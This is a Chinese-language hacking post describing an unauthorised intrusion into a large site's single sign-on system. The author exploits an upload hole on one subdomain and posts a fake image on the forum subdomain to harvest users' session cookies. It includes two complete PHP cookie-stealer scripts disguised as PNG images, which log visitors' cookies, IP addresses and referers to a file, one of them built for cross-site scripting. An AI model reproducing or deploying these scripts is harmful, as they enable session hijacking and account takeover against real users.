最近在渗透某大型网站,注册后发现其为sso技术,登陆后可以登入任何其分站,包括论坛等。由于策略不严谨,因此存在另外一种思路的跨站漏洞。发现其sso返回cookie 作用域是 .abc.com,仅需以下cookie即可访问了。分析如下
Set-Cookie: abcsession=2C521723E6C202D8648F14E9D93C319D; expires=Tue, 08-Nov-41 03:03:12 GMT; path=/; domain=.abc.com
在abc.com下某一分站hb.abc.com存在上传漏洞(linxu权限机器死,上传大马小马功能等都受限),还好gd裤 还在,于是上传了一个php来抓cookie。
该php返回为png,同时保持cookie到本地文件夹。
于是果断在其分站bbs.abc.com论坛发表图片,地址为本程序路径。后面的就淫荡的不说了!
注意:不是用户跨站收cookie的程序!
<?php date_default_timezone_set("PRC"); header("content-type:image/png"); $img=ImageCreate(100,35); $bgcolor=ImageColorAllocate($img,0,0,0); $red=ImageColorAllocate($img,255,0,0); $bgcolortrans=ImageColorTransparent($img,$bgcolor); ImageString($img,5,10,10,"No Found !",$red); ImagePng($img); ImageDestroy($img); $cookie="---------".date("Y年m月d日G点i分s秒")."---------\n"; foreach ($GLOBALS[_COOKIE] as $key=>$v) { $cookie= $cookie.$key.'='.$v.";"; } $cookie=$cookie."\n远程IP地址为: ".$GLOBALS[REMOTE_ADDR]."\n"; $cookie=$cookie."跳转页面为: ".$_SERVER[HTTP_REFERER]."\n"; $cookie=$cookie."----------------------------------------\n\n"; $fp=fopen('cook.txt','at'); fwrite($fp,$cookie); fclose($fp); ?>
纯粹跨站cookie代码:
<?php date_default_timezone_set("PRC"); header("content-type:image/png"); $img=ImageCreate(100,35); $bgcolor=ImageColorAllocate($img,0,0,0); $red=ImageColorAllocate($img,255,0,0); $bgcolortrans=ImageColorTransparent($img,$bgcolor); ImageString($img,5,10,10,"No Found !",$red); ImagePng($img); ImageDestroy($img); $cookie="---------".date("Y年m月d日G点i分s秒")."---------\n"; $cookie.="Cookie为:".$_SERVER[QUERY_STRING]; $cookie.="\n远程IP地址为: ".$GLOBALS[REMOTE_ADDR]."\n"; $cookie.="跳转页面为: ".$_SERVER[HTTP_REFERER]."\n"; $cookie.="用户浏览器: ".$_SERVER[HTTP_USER_AGENT]."\n"; $cookie.="----------------------------------------\n\n"; $fp=fopen('cookie.txt','at'); fwrite($fp,$cookie); fclose($fp); ?>